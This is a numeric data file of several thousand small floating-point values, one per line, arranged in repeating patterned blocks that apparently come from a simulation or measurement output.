0.000381559
0.000385357
0.000381561
0.000359012
0.000358601
0.000355207
0.000355207
0.000358853
0.000358855
0.000355049
0.00035901
0.0003586
0.000355211
0.000355209
0.000355052
0.000358854
0.000358853
0.000346266
0.000350056
0.000350057
0.000346658
0.000350215
0.00034642
0.000346418
0.000323873
0.000323463
0.000320069
0.000320071
0.000323716
0.000323719
0.000319911
0.000346268
0.000350058
0.000350059
0.000346663
0.000346422
0.000350217
0.000346424
0.000323874
0.000323462
0.00032007
0.000320071
0.000323715
0.000323716
0.000319912
0.000346267
0.000350057
0.000350059
0.000346662
0.000346422
0.000350217
0.000346422
0.000323874
0.000323462
0.000320068
0.000320069
0.000323714
0.000323718
0.000319911
0.000323875
0.000323465
0.000320072
0.000320072
0.000319915
0.000323717
0.000323719
0.000311135
0.000314926
0.000314926
0.000311527
0.000315082
0.000311291
0.000311289
0.00028874
0.000288329
0.000284937
0.000284936
0.000288582
0.000288584
0.000284778
0.000311137
0.000314927
0.000314929
0.000311532
0.000311294
0.000315083
0.000311295
0.000288745
0.00028833
0.00028494
0.000284939
0.000288585
0.000288585
0.000284783
0.00031113
0.000314922
0.000314923
0.000311527
0.000311285
0.00031508
0.000311286
0.000288742
0.00028833
0.000284935
0.000284935
0.000288581
0.000288583
0.000284778
0.000288746
0.000288333
0.000284943
0.000284942
0.000284786
0.000288587
0.000288587
0.000276002
0.000279791
0.000279791
0.000276396
0.000279948
0.000276157
0.000276157
0.000253619
0.000253206
0.000249814
0.000249812
0.000253462
0.000253462
0.000249654
0.000276005
0.000279793
0.000279795
0.000276398
0.000276161
0.000279952
0.000276159
0.000253619
0.000253204
0.000249815
0.000249816
0.000253456
0.000253458
0.000249658
0.000276
0.000279788
0.000279788
0.000276395
0.000276152
0.000279947
0.000276156
0.000253614
0.000253204
0.000249809
0.00024981
0.000253455
0.000253459
0.000249652
0.000253617
0.000253208
0.000249815
0.000249816
0.000249655
0.000253462
0.000253463
0.000240877
0.000244662
0.000244663
0.000241271
0.000244821
0.000241034
0.000241033
0.000218492
0.000218081
0.000214685
0.000214685
0.000218334
0.000218333
0.000214527
0.000240886
0.000244669
0.000244672
0.000241276
0.00024104
0.000244827
0.000241041
0.000218494
0.000218081
0.000214686
0.000214688
0.000218333
0.000218338
0.00021453
0.000240875
0.000244661
0.000244661
0.000241269
0.000241028
0.000244819
0.00024103
0.000218493
0.000218074
0.00021468
0.000214683
0.000218327
0.000218333
0.000214526
0.000218491
0.000218082
0.000214687
0.000214687
0.000214528
0.000218334
0.000218336
0.00020575
0.000209531
0.000209533
0.000206145
0.00020969
0.000205906
0.000205904
0.000183359
0.000182949
0.00017955
0.000179549
0.000183202
0.000183203
0.00017939
0.000205756
0.000209532
0.000209534
0.000206146
0.000205908
0.000209693
0.000205909
0.000183362
0.000182951
0.000179555
0.000179553
0.000183204
0.000183205
0.000179394
0.00020575
0.000209529
0.000209531
0.000206142
0.000205905
0.00020969
0.000205905
0.000183356
0.000182946
0.000179545
0.000179548
0.000183199
0.000183203
0.000179387
0.00018336
0.00018295
0.000179554
0.000179551
0.000179393
0.000183203
0.000183202
0.000170614
0.00017439
0.000174388
0.000171009
0.000174547
0.000170771
0.000170769
0.000148218
0.000147813
0.000144407
0.00014441
0.000148063
0.000148066
0.000144248
0.00017062
0.000174393
0.000174392
0.000171013
0.000170773
0.000174552
0.000170776
0.000148222
0.000147814
0.000144412
0.000144411
0.000148064
0.000148066
0.000144254
0.000170613
0.000174384
0.000174388
0.000171006
0.000170768
0.000174545
0.000170768
0.000148221
0.000147816
0.000144416
0.000144415
0.00014807
0.000148071
0.00014425
0.000148227
0.00014782
0.000144421
0.000144422
0.000144259
0.000148073
0.000148075
0.000135477
0.000139235
0.000139238
0.000135868
0.000139398
0.000135633
0.000135634
0.00011307
0.000112672
0.000109253
0.000109254
0.000112918
0.00011292
0.000109092
0.000135478
0.000139236
0.000139238
0.000135863
0.000135628
0.000139402
0.000135629
0.000113073
0.000112679
0.000109262
0.000109262
0.000112927
0.000112926
0.000109095
0.000135476
0.000139237
0.000139238
0.000135865
0.000135627
0.000139398
0.000135631
0.000113075
0.000112677
0.000109264
0.000109264
0.000112927
0.000112929
0.000109098
0.000113074
0.000112675
0.000109262
0.00010926
0.000109097
0.000112928
0.000112927
0.000100321
0.000104055
0.000104056
0.000100706
0.000104225
0.000100475
0.000100474
7.79073e-05
7.75346e-05
7.40957e-05
7.40946e-05
7.7772e-05
7.77722e-05
7.39248e-05
0.00010032
0.000104057
0.000104059
0.000100704
0.000100472
0.000104225
0.000100471
7.79021e-05
7.75333e-05
7.40908e-05
7.40925e-05
7.77659e-05
7.77692e-05
7.39206e-05
0.000100326
0.000104062
0.000104064
0.000100707
0.000100478
0.00010423
0.000100479
7.7905e-05
7.75302e-05
7.40896e-05
7.40901e-05
7.77656e-05
7.77676e-05
7.3923e-05
7.79027e-05
7.75291e-05
7.40904e-05
7.40894e-05
7.39224e-05
7.77651e-05
7.77664e-05
6.51624e-05
6.88409e-05
6.88415e-05
6.55327e-05
6.90236e-05
6.5313e-05
6.53122e-05
4.26661e-05
4.24303e-05
3.8961e-05
3.89594e-05
4.26277e-05
4.2631e-05
3.87266e-05
6.5161e-05
6.88344e-05
6.88385e-05
6.55337e-05
6.53124e-05
6.90193e-05
6.53099e-05
4.26682e-05
4.24306e-05
3.89603e-05
3.89613e-05
4.26289e-05
4.26333e-05
3.87273e-05
6.51607e-05
6.88358e-05
6.88368e-05
6.55306e-05
6.53095e-05
6.90214e-05
6.53091e-05
4.26671e-05
4.24269e-05
3.89559e-05
3.89566e-05
4.26246e-05
4.26271e-05
3.87214e-05
4.26629e-05
4.2425e-05
3.89535e-05
3.89522e-05
3.87217e-05
4.26232e-05
4.26271e-05
2.9899e-05
3.35518e-05
3.35509e-05
3.04988e-05
3.36767e-05
3.02004e-05
3.01981e-05
7.68807e-06
1.02082e-05
7.22919e-06
7.22894e-06
9.24303e-06
9.23917e-06
5.8546e-06
2.98987e-05
3.35534e-05
3.35545e-05
3.04994e-05
3.02011e-05
3.36768e-05
3.02036e-05
7.69013e-06
1.02087e-05
7.22929e-06
7.23105e-06
9.24541e-06
9.24244e-06
5.86181e-06
2.98924e-05
3.35448e-05
3.35455e-05
3.04929e-05
3.0192e-05
3.36712e-05
3.01919e-05
7.67926e-06
1.01997e-05
7.21994e-06
7.22397e-06
9.236e-06
9.23334e-06
5.84884e-06
7.67744e-06
1.01958e-05
7.2221e-06
7.22256e-06
5.85042e-06
9.23299e-06
9.23067e-06
5.46351e-06
5.29698e-06
5.29212e-06
4.29744e-06
3.13583e-06
5.50417e-06
5.50695e-06
5.4665e-06
5.30409e-06
5.29243e-06
4.30217e-06
5.50395e-06
3.13843e-06
5.50217e-06
5.46536e-06
5.29598e-06
5.28778e-06
4.29748e-06
5.50372e-06
3.13184e-06
5.49865e-06
0.000734681
0.000734681
0.000725908
0.000725904
0.000725904
0.000725899
0.000734675
0.000734678
0.000734679
0.000725905
0.000725901
0.000725903
0.000725898
0.000734674
0.00073468
0.000734679
0.000725908
0.000725904
0.000725903
0.000725899
0.000734675
0.00071713
0.000708343
0.000708342
0.000717127
0.000717125
0.000717126
0.000708342
0.000717129
0.000708346
0.000708344
0.000717127
0.000717126
0.000717126
0.000708344
0.000717128
0.000708343
0.000708345
0.000717124
0.000717126
0.000717126
0.000708343
0.00071713
0.000708346
0.000708347
0.000717127
0.000717127
0.000717126
0.000708344
0.000727676
0.000727897
0.000723853
0.00072406
0.000727903
0.000727683
0.000724066
0.000732833
0.000736592
0.00073671
0.00073259
0.000736501
0.000732734
0.000732629
0.000732865
0.000732653
0.000736692
0.000736466
0.000736468
0.000732649
0.00073286
0.000727713
0.000723837
0.000727955
0.000723941
0.000727806
0.000727924
0.000724036
0.000727674
0.000727906
0.000724052
0.000723856
0.000727677
0.000727911
0.000724061
0.000732834
0.000736591
0.000736715
0.000732592
0.000736503
0.000732735
0.000732634
0.000732868
0.000732663
0.000736472
0.000736694
0.000736473
0.000732865
0.000732654
0.000727713
0.000723841
0.000727957
0.00072394
0.000727807
0.00072793
0.000724035
0.000727863
0.000727446
0.000724058
0.000724056
0.000727703
0.000727704
0.0007239
0.000699563
0.000699562
0.000690788
0.000690781
0.000690782
0.000690774
0.000699557
0.000699561
0.000699563
0.000690785
0.000690778
0.00069078
0.000690773
0.000699556
0.000699563
0.000699565
0.000690788
0.000690782
0.000690782
0.000690773
0.000699557
0.000682006
0.000673218
0.000673217
0.000682
0.000681999
0.000681998
0.000673217
0.000682009
0.000673218
0.000673221
0.000681999
0.000682
0.000681997
0.000673218
0.000682005
0.000673217
0.000673219
0.000681997
0.000681998
0.000681996
0.000673217
0.000682007
0.000673219
0.00067322
0.000682
0.000682
0.000681996
0.000673219
0.000692569
0.000692794
0.000688748
0.00068896
0.000692796
0.000692576
0.000688961
0.00069771
0.000701476
0.000701594
0.000697476
0.000701386
0.000697614
0.00069751
0.000697745
0.000697538
0.000701579
0.000701353
0.000701355
0.000697532
0.000697741
0.000692601
0.00068873
0.000692846
0.000688838
0.000692697
0.000692813
0.000688929
0.000692568
0.000692789
0.000688956
0.000688746
0.000692574
0.000692793
0.000688957
0.000697708
0.000701474
0.000701591
0.000697473
0.000701385
0.000697611
0.000697506
0.000697743
0.000697535
0.000701355
0.000701572
0.000701353
0.000697741
0.000697527
0.000692598
0.000688727
0.000692844
0.000688832
0.000692691
0.000692809
0.000688924
0.000692749
0.000692338
0.000688953
0.000688953
0.000692593
0.000692593
0.000688795
0.00066444
0.000664442
0.000655671
0.000655663
0.000655664
0.000655657
0.000664437
0.00066444
0.00066444
0.000655668
0.000655662
0.000655661
0.000655655
0.000664436
0.000664441
0.000664442
0.000655666
0.000655662
0.000655663
0.000655656
0.000664437
0.000646889
0.0006381
0.000638101
0.000646883
0.000646883
0.00064688
0.000638099
0.000646892
0.000638102
0.000638103
0.000646883
0.000646885
0.00064688
0.0006381
0.000646888
0.000638102
0.0006381
0.000646882
0.000646881
0.000646878
0.0006381
0.000646887
0.000638103
0.0006381
0.000646883
0.000646881
0.00064688
0.000638101
0.000657454
0.000657677
0.000653632
0.000653842
0.000657679
0.000657461
0.000653844
0.000662595
0.000666361
0.000666478
0.000662358
0.00066627
0.000662497
0.000662393
0.000662627
0.00066242
0.000666459
0.000666235
0.000666237
0.000662412
0.000662624
0.000657486
0.000653613
0.000657729
0.000653717
0.00065758
0.000657697
0.000653811
0.000657448
0.00065767
0.000653835
0.000653628
0.000657455
0.000657675
0.000653835
0.000662589
0.000666354
0.000666473
0.000662356
0.000666264
0.000662493
0.00066239
0.000662623
0.000662413
0.000666227
0.000666454
0.000666231
0.000662618
0.000662408
0.000657481
0.000653612
0.000657727
0.000653716
0.000657577
0.000657696
0.000653806
0.000657631
0.000657218
0.000653835
0.000653832
0.000657473
0.000657473
0.000653675
0.000629321
0.000629323
0.000620551
0.000620542
0.000620543
0.000620535
0.000629317
0.000629323
0.000629322
0.000620549
0.000620544
0.000620543
0.000620535
0.000629317
0.000629323
0.000629321
0.000620547
0.000620543
0.000620543
0.000620536
0.000629318
0.000611769
0.00060298
0.000602981
0.000611763
0.000611763
0.00061176
0.000602979
0.00061177
0.00060298
0.000602981
0.000611761
0.000611762
0.000611759
0.000602979
0.000611771
0.000602982
0.000602981
0.000611763
0.000611762
0.000611759
0.00060298
0.000611767
0.000602979
0.000602981
0.000611762
0.000611763
0.000611759
0.000602979
0.000622335
0.000622559
0.000618513
0.000618722
0.000622561
0.00062234
0.000618723
0.000627475
0.000631241
0.000631359
0.000627239
0.00063115
0.000627379
0.000627275
0.000627509
0.000627301
0.00063134
0.000631118
0.000631118
0.000627294
0.000627505
0.000622366
0.000618498
0.000622611
0.000618603
0.000622463
0.000622579
0.000618693
0.000622332
0.000622552
0.000618716
0.000618508
0.000622334
0.000622556
0.000618721
0.000627471
0.000631237
0.000631353
0.000627235
0.000631146
0.000627375
0.000627267
0.000627507
0.000627298
0.000631116
0.000631336
0.000631119
0.000627502
0.000627289
0.000622362
0.000618489
0.000622607
0.000618598
0.000622458
0.000622572
0.000618689
0.000622516
0.000622104
0.000618723
0.000618724
0.000622361
0.00062236
0.000618562
0.000594201
0.000594201
0.000585427
0.00058542
0.00058542
0.000585413
0.000594196
0.000594201
0.000594201
0.000585427
0.00058542
0.000585421
0.000585413
0.000594196
0.0005942
0.000594202
0.000585426
0.000585421
0.000585422
0.000585414
0.000594196
0.000576647
0.000567856
0.000567857
0.00057664
0.00057664
0.000576636
0.000567854
0.000576646
0.000567857
0.000567856
0.000576639
0.000576638
0.000576636
0.000567855
0.000576648
0.000567857
0.000567856
0.000576638
0.000576638
0.000576635
0.000567855
0.000576645
0.000567855
0.000567856
0.000576639
0.00057664
0.000576636
0.000567855
0.000587214
0.000587438
0.000583395
0.000583599
0.000587443
0.000587219
0.000583602
0.000592357
0.00059612
0.000596238
0.000592121
0.00059603
0.00059226
0.000592156
0.000592393
0.000592184
0.000596222
0.000596002
0.000596004
0.000592176
0.000592388
0.000587248
0.000583379
0.000587493
0.000583482
0.000587343
0.000587462
0.000583573
0.000587215
0.000587435
0.000583598
0.000583389
0.000587218
0.000587438
0.000583601
0.000592356
0.000596121
0.000596237
0.000592118
0.00059603
0.000592258
0.000592152
0.000592389
0.000592181
0.000596
0.000596219
0.000595998
0.000592387
0.000592173
0.000587248
0.000583374
0.00058749
0.000583481
0.000587341
0.000587457
0.000583571
0.000587395
0.000586974
0.000583594
0.00058359
0.000587234
0.000587234
0.000583435
0.000559076
0.000559076
0.000550302
0.000550294
0.000550293
0.000550287
0.000559071
0.000559076
0.000559075
0.0005503
0.000550295
0.000550294
0.000550287
0.00055907
0.000559075
0.000559076
0.000550299
0.000550293
0.000550294
0.000550287
0.000559071
0.000541521
0.000532729
0.000532727
0.000541513
0.000541513
0.000541509
0.000532725
0.00054152
0.000532728
0.000532726
0.000541512
0.00054151
0.000541508
0.000532725
0.000541519
0.000532727
0.000532727
0.000541512
0.000541511
0.000541508
0.000532726
0.000541517
0.000532726
0.000532727
0.00054151
0.000541511
0.000541508
0.000532726
0.000552087
0.000552311
0.000548265
0.000548473
0.000552314
0.000552094
0.000548475
0.000557227
0.000561
0.000561119
0.000557
0.000560905
0.000557135
0.000557033
0.000557262
0.000557055
0.000561099
0.000560871
0.000560872
0.00055705
0.000557259
0.00055212
0.00054825
0.000552369
0.000548354
0.000552217
0.000552336
0.000548443
0.000552089
0.00055231
0.000548473
0.000548265
0.000552094
0.000552314
0.000548475
0.000557228
0.000560997
0.000561115
0.000556996
0.000560904
0.000557134
0.000557029
0.000557266
0.000557057
0.000560872
0.000561097
0.000560875
0.000557261
0.000557051
0.000552119
0.000548248
0.000552366
0.000548356
0.000552216
0.000552331
0.000548445
0.000552271
0.000551852
0.000548468
0.00054847
0.000552111
0.000552112
0.000548312
0.000523945
0.000523943
0.000515167
0.000515161
0.000515159
0.000515154
0.000523939
0.000523944
0.000523945
0.000515169
0.000515161
0.000515162
0.000515154
0.000523939
0.000523942
0.000523945
0.000515168
0.000515159
0.000515162
0.000515154
0.000523939
0.000506384
0.000497589
0.00049759
0.000506377
0.000506378
0.000506374
0.000497588
0.000506383
0.000497589
0.00049759
0.000506375
0.000506376
0.000506373
0.000497588
0.000506386
0.00049759
0.000497591
0.000506377
0.000506377
0.000506373
0.000497589
0.000506385
0.00049759
0.000497591
0.000506376
0.000506377
0.000506374
0.000497589
0.000516956
0.000517181
0.000513137
0.000513336
0.000517186
0.000516957
0.000513342
0.000522098
0.000525867
0.000525982
0.000521862
0.000525777
0.000522002
0.000521896
0.000522135
0.000521926
0.000525966
0.00052574
0.000525745
0.000521919
0.000522128
0.000516988
0.000513118
0.000517231
0.000513221
0.000517082
0.000517198
0.000513313
0.000516957
0.000517179
0.00051334
0.000513134
0.00051696
0.000517185
0.000513342
0.000522101
0.00052587
0.00052599
0.000521866
0.000525778
0.000522004
0.000521902
0.000522135
0.000521925
0.000525743
0.000525969
0.000525744
0.000522129
0.00052192
0.000516991
0.000513117
0.000517234
0.000513222
0.000517084
0.000517204
0.000513313
0.000517133
0.00051672
0.000513334
0.000513333
0.000516976
0.000516975
0.000513173
0.000488805
0.000488807
0.000480027
0.00048002
0.000480022
0.000480015
0.000488801
0.000488805
0.000488807
0.000480029
0.000480021
0.000480023
0.000480016
0.000488802
0.000488807
0.000488808
0.000480028
0.000480022
0.000480023
0.000480016
0.000488802
0.000471244
0.000462449
0.000462449
0.000471237
0.000471236
0.000471234
0.000462448
0.000471242
0.000462448
0.00046245
0.000471235
0.000471237
0.000471233
0.000462448
0.000471245
0.00046245
0.000462451
0.000471236
0.000471238
0.000471234
0.000462449
0.000471244
0.000462451
0.000462451
0.000471238
0.000471238
0.000471235
0.00046245
0.000481812
0.000482036
0.000477986
0.000478199
0.000482037
0.000481818
0.000478199
0.000486956
0.000490725
0.000490842
0.000486722
0.000490635
0.00048686
0.000486755
0.000486991
0.000486781
0.000490824
0.000490602
0.000490603
0.000486775
0.000486987
0.000481843
0.000477969
0.00048209
0.000478076
0.000481939
0.000482055
0.000478166
0.00048182
0.000482044
0.000478204
0.000477997
0.000481825
0.000482048
0.000478208
0.000486962
0.00049073
0.000490849
0.000486729
0.000490637
0.000486868
0.000486764
0.000486995
0.000486789
0.000490606
0.000490829
0.000490606
0.000486991
0.000486782
0.00048185
0.00047798
0.000482099
0.000478085
0.000481947
0.000482067
0.000478172
0.000481998
0.000481587
0.000478199
0.000478199
0.000481843
0.000481845
0.000478037
0.000453663
0.000453665
0.000444884
0.000444878
0.000444879
0.000444874
0.00045366
0.000453666
0.000453666
0.000444888
0.000444881
0.000444881
0.000444875
0.000453662
0.000453666
0.000453666
0.000444887
0.00044488
0.000444881
0.000444875
0.000453662
0.000436102
0.000427307
0.000427308
0.000436094
0.000436096
0.000436093
0.000427307
0.0004361
0.000427307
0.000427309
0.000436093
0.000436095
0.000436092
0.000427308
0.000436104
0.000427309
0.00042731
0.000436096
0.000436096
0.000436093
0.000427308
0.000436103
0.000427309
0.000427311
0.000436094
0.000436097
0.000436093
0.000427309
0.000446673
0.000446898
0.000442849
0.000443058
0.000446899
0.000446677
0.000443061
0.000451819
0.000455588
0.000455704
0.000451584
0.000455496
0.000451723
0.000451618
0.000451853
0.000451644
0.000455686
0.000455464
0.000455465
0.000451639
0.000451847
0.000446704
0.000442832
0.000446952
0.000442937
0.0004468
0.000446917
0.000443029
0.000446679
0.000446903
0.000443063
0.000442855
0.000446681
0.000446907
0.000443067
0.000451821
0.00045559
0.000455709
0.000451586
0.0004555
0.000451725
0.000451621
0.000451854
0.000451648
0.000455464
0.00045569
0.000455466
0.000451849
0.000451642
0.000446711
0.000442835
0.000446955
0.00044294
0.000446803
0.000446922
0.000443036
0.000446856
0.000446441
0.000443051
0.000443054
0.000446696
0.000446698
0.000442893
0.000418524
0.000418525
0.000409746
0.00040974
0.00040974
0.000409735
0.000418521
0.000418525
0.000418526
0.000409748
0.000409741
0.000409742
0.000409735
0.000418521
0.000418525
0.000418527
0.000409746
0.00040974
0.000409742
0.000409735
0.000418521
0.000400965
0.000392169
0.000392169
0.000400957
0.000400956
0.000400954
0.000392168
0.000400962
0.000392169
0.00039217
0.000400956
0.000400955
0.000400953
0.000392169
0.000400963
0.00039217
0.000392171
0.000400956
0.000400957
0.000400954
0.000392169
0.000400962
0.00039217
0.000392171
0.000400955
0.000400957
0.000400954
0.00039217
0.000411533
0.000411757
0.000407709
0.000407919
0.000411759
0.000411538
0.000407922
0.000416677
0.000420447
0.000420568
0.000416445
0.000420355
0.000416581
0.000416481
0.000416709
0.000416503
0.000420545
0.000420318
0.00042032
0.000416497
0.000416704
0.000411564
0.000407693
0.000411812
0.000407797
0.000411658
0.00041178
0.000407887
0.000411535
0.000411757
0.00040792
0.00040771
0.000411539
0.00041176
0.000407924
0.000416677
0.000420449
0.000420566
0.000416444
0.000420356
0.000416583
0.000416477
0.000416712
0.000416504
0.000420324
0.000420548
0.000420325
0.000416706
0.000416498
0.000411567
0.000407691
0.000411811
0.000407798
0.00041166
0.000411777
0.000407892
0.000411717
0.000411298
0.000407915
0.000407913
0.000411556
0.000411557
0.000407756
0.000383386
0.000383388
0.000374607
0.000374601
0.000374603
0.000374596
0.000383382
0.000383386
0.000383387
0.000374608
0.000374603
0.000374602
0.000374596
0.000383382
0.000383388
0.000383387
0.000374609
0.000374603
0.000374602
0.000374596
0.000383382
0.000365824
0.000357031
0.000357032
0.000365818
0.000365818
0.000365816
0.00035703
0.000365823
0.00035703
0.000357031
0.000365816
0.000365818
0.000365815
0.000357031
0.000365825
0.000357033
0.000357032
0.000365819
0.000365818
0.000365815
0.000357031
0.000365825
0.000357032
0.000357033
0.000365818
0.000365818
0.000365815
0.000357032
0.000376395
0.00037662
0.000372571
0.000372777
0.000376624
0.000376399
0.00037278
0.00038154
0.000385306
0.000385422
0.000381303
0.000385214
0.000381443
0.000381337
0.000381575
0.000381367
0.000385407
0.000385185
0.000385184
0.00038136
0.00038157
0.000376429
0.000372554
0.000376671
0.000372657
0.000376522
0.000376641
0.00037275
0.000376397
0.00037662
0.000372783
0.000372572
0.000376403
0.000376622
0.000372783
0.000381541
0.000385308
0.000385425
0.000381303
0.000385219
0.000381443
0.000381338
0.000381575
0.000381366
0.000385185
0.000385408
0.000385188
0.000381571
0.000381359
0.000376429
0.000372554
0.000376672
0.000372661
0.000376522
0.00037664
0.000372752
0.000376579
0.00037616
0.000372775
0.000372774
0.000376417
0.000376417
0.000372617
0.000348248
0.000348249
0.00033947
0.000339465
0.000339465
0.000339459
0.000348244
0.000348249
0.000348249
0.000339471
0.000339466
0.000339466
0.00033946
0.000348245
0.000348249
0.00034825
0.000339472
0.000339465
0.000339466
0.00033946
0.000348245
0.000330688
0.000321895
0.000321896
0.000330681
0.000330682
0.00033068
0.000321895
0.000330687
0.000321896
0.000321897
0.000330681
0.000330682
0.000330679
0.000321896
0.000330688
0.000321896
0.000321897
0.000330682
0.000330683
0.000330679
0.000321896
0.000330689
0.000321897
0.000321898
0.000330682
0.000330683
0.00033068
0.000321897
0.000341256
0.000341482
0.000337434
0.000337645
0.000341484
0.000341263
0.000337644
0.0003464
0.000350169
0.000350286
0.000346166
0.000350078
0.000346305
0.0003462
0.000346435
0.000346226
0.000350269
0.000350043
0.000350046
0.00034622
0.00034643
0.00034129
0.000337417
0.000341535
0.000337523
0.000341385
0.000341502
0.000337615
0.000341255
0.000341483
0.000337643
0.000337437
0.000341262
0.000341488
0.000337643
0.000346404
0.00035017
0.000350289
0.00034617
0.000350081
0.000346309
0.000346207
0.000346437
0.000346229
0.000350048
0.000350273
0.000350051
0.000346432
0.000346224
0.000341289
0.000337423
0.00034154
0.000337524
0.000341386
0.000341509
0.000337615
0.000341444
0.000341025
0.000337639
0.00033764
0.000341282
0.000341282
0.000337481
0.000313114
0.000313116
0.000304336
0.000304332
0.000304332
0.000304326
0.000313111
0.000313114
0.000313115
0.000304337
0.000304331
0.000304332
0.000304326
0.00031311
0.000313115
0.000313115
0.000304338
0.000304332
0.000304332
0.000304327
0.000313111
0.000295555
0.000286764
0.000286765
0.000295549
0.000295549
0.000295547
0.000286764
0.000295554
0.000286764
0.000286766
0.000295549
0.000295549
0.000295547
0.000286765
0.000295555
0.000286764
0.000286765
0.000295549
0.000295548
0.000295547
0.000286765
0.000295556
0.000286766
0.000286766
0.00029555
0.00029555
0.000295547
0.000286766
0.000306125
0.000306352
0.000302304
0.000302508
0.000306353
0.000306129
0.000302513
0.000311269
0.000315034
0.00031515
0.000311033
0.000314945
0.000311171
0.000311067
0.000311306
0.000311098
0.000315133
0.000314916
0.000314917
0.000311087
0.000311304
0.000306156
0.000302288
0.000306403
0.000302391
0.000306251
0.000306369
0.000302481
0.000306123
0.000306348
0.000302509
0.000302305
0.000306127
0.000306351
0.000302514
0.000311267
0.000315034
0.000315151
0.00031103
0.000314944
0.000311169
0.000311064
0.000311303
0.000311094
0.000314915
0.000315134
0.000314915
0.000311299
0.000311087
0.000306155
0.000302284
0.0003064
0.00030239
0.000306247
0.000306366
0.000302482
0.00030631
0.000305896
0.000302508
0.000302509
0.000306153
0.000306154
0.000302347
0.000277983
0.000277985
0.000269208
0.000269202
0.000269203
0.000269197
0.00027798
0.000277983
0.000277984
0.000269206
0.000269201
0.000269203
0.000269196
0.00027798
0.000277985
0.000277986
0.000269207
0.000269203
0.000269203
0.000269197
0.000277981
0.000260426
0.000251637
0.000251637
0.00026042
0.000260421
0.000260419
0.000251637
0.000260427
0.000251638
0.000251637
0.00026042
0.000260421
0.000260418
0.000251638
0.000260427
0.000251637
0.000251637
0.000260419
0.00026042
0.000260418
0.000251636
0.000260427
0.000251637
0.000251638
0.00026042
0.000260422
0.000260418
0.000251637
0.000270989
0.000271218
0.000267172
0.00026738
0.000271219
0.000270993
0.000267382
0.000276137
0.000279905
0.000280021
0.000275903
0.000279813
0.000276044
0.000275938
0.000276172
0.000275964
0.00028
0.000279783
0.000279782
0.000275956
0.000276167
0.000271022
0.000267156
0.000271272
0.000267262
0.00027112
0.000271238
0.000267351
0.000270988
0.000271217
0.00026738
0.00026717
0.000270994
0.000271218
0.000267379
0.000276137
0.000279901
0.000280024
0.000275903
0.000279811
0.000276039
0.000275941
0.000276168
0.000275963
0.000279779
0.000280003
0.000279778
0.000276166
0.000275956
0.000271021
0.000267157
0.000271272
0.000267257
0.000271117
0.000271242
0.000267348
0.000271184
0.000270764
0.000267378
0.000267377
0.000271023
0.000271024
0.00026722
0.000242857
0.000242857
0.000234082
0.000234077
0.000234077
0.000234071
0.000242854
0.000242855
0.000242856
0.000234078
0.000234074
0.000234074
0.000234069
0.000242852
0.000242856
0.000242857
0.000234078
0.000234075
0.000234075
0.000234071
0.000242853
0.000225301
0.000216512
0.000216511
0.000225296
0.000225294
0.000225292
0.00021651
0.000225301
0.000216512
0.000216513
0.000225295
0.000225295
0.000225292
0.00021651
0.000225298
0.00021651
0.000216508
0.000225292
0.000225292
0.00022529
0.000216509
0.000225299
0.000216512
0.000216508
0.000225293
0.000225293
0.000225291
0.000216509
0.000235866
0.000236094
0.000232053
0.000232256
0.000236098
0.000235868
0.000232261
0.000241015
0.000244778
0.000244894
0.000240779
0.000244689
0.000240919
0.000240813
0.000241053
0.000240842
0.000244881
0.00024466
0.000244661
0.000240836
0.000241047
0.0002359
0.000232033
0.000236147
0.000232137
0.000235996
0.000236114
0.000232228
0.000235863
0.000236088
0.000232258
0.000232043
0.000235868
0.000236089
0.000232257
0.000241008
0.000244771
0.000244887
0.000240772
0.000244681
0.000240912
0.000240805
0.000241047
0.000240835
0.000244657
0.000244872
0.000244657
0.000241041
0.000240827
0.000235894
0.000232024
0.00023614
0.000232132
0.000235989
0.000236105
0.000232223
0.000236051
0.000235637
0.000232247
0.000232247
0.000235891
0.000235893
0.000232088
0.000207729
0.00020773
0.00019895
0.000198947
0.000198948
0.000198941
0.000207725
0.000207727
0.000207725
0.000198948
0.000198946
0.000198943
0.000198939
0.000207723
0.000207729
0.000207726
0.000198949
0.000198947
0.000198945
0.00019894
0.000207724
0.000190167
0.000181376
0.000181376
0.000190162
0.000190161
0.00019016
0.000181375
0.000190167
0.000181377
0.000181378
0.000190162
0.000190162
0.00019016
0.000181377
0.000190166
0.000181376
0.000181376
0.00019016
0.00019016
0.000190158
0.000181375
0.000190168
0.00018138
0.000181379
0.000190163
0.000190162
0.00019016
0.000181377
0.00020073
0.000200964
0.000196922
0.000197127
0.000200965
0.000200731
0.000197131
0.000205889
0.000209651
0.000209766
0.000205653
0.00020956
0.000205794
0.000205689
0.000205924
0.000205713
0.000209747
0.000209537
0.000209534
0.000205707
0.000205919
0.000200768
0.000196906
0.000201018
0.000197009
0.000200866
0.000200985
0.000197099
0.000200722
0.000200959
0.000197121
0.00019692
0.000200725
0.000200965
0.000197122
0.000205885
0.000209646
0.000209767
0.00020565
0.000209558
0.00020579
0.000205689
0.000205915
0.000205708
0.000209528
0.000209746
0.000209527
0.000205908
0.000205704
0.000200764
0.000196903
0.000201015
0.000197004
0.000200862
0.000200987
0.000197095
0.000200924
0.000200512
0.000197122
0.00019712
0.000200769
0.000200767
0.00019696
0.00017259
0.000172592
0.00016381
0.000163807
0.000163809
0.000163803
0.000172588
0.000172589
0.000172591
0.000163809
0.000163808
0.000163807
0.000163801
0.000172587
0.000172594
0.000172593
0.00016381
0.00016381
0.000163808
0.000163803
0.000172589
0.000155027
0.000146235
0.000146236
0.000155019
0.00015502
0.000155019
0.000146232
0.000155029
0.000146236
0.000146238
0.00015502
0.000155021
0.000155018
0.000146234
0.000155026
0.000146237
0.000146234
0.00015502
0.000155018
0.000155018
0.000146233
0.000155027
0.000146237
0.000146234
0.000155021
0.000155018
0.000155018
0.000146234
0.000165583
0.00016583
0.000161794
0.000161994
0.000165835
0.000165587
0.000161995
0.00017076
0.000174512
0.000174632
0.000170521
0.000174427
0.000170661
0.000170559
0.000170795
0.000170583
0.000174618
0.000174405
0.000174404
0.000170583
0.000170789
0.000165632
0.000161772
0.00016588
0.000161874
0.000165728
0.000165853
0.000161967
0.000165576
0.000165815
0.000161987
0.00016178
0.00016558
0.000165817
0.000161988
0.000170748
0.000174502
0.000174619
0.000170511
0.000174416
0.000170652
0.000170545
0.000170784
0.00017057
0.000174399
0.000174605
0.000174395
0.000170779
0.000170565
0.000165621
0.000161761
0.000165872
0.000161866
0.000165719
0.00016584
0.000161958
0.000165792
0.00016538
0.000161986
0.000161983
0.000165637
0.000165633
0.000161825
0.000137445
0.000137448
0.000128661
0.000128662
0.000128663
0.000128654
0.000137442
0.000137445
0.000137443
0.000128659
0.000128662
0.000128661
0.000128653
0.000137442
0.000137447
0.000137443
0.000128659
0.000128663
0.000128662
0.000128654
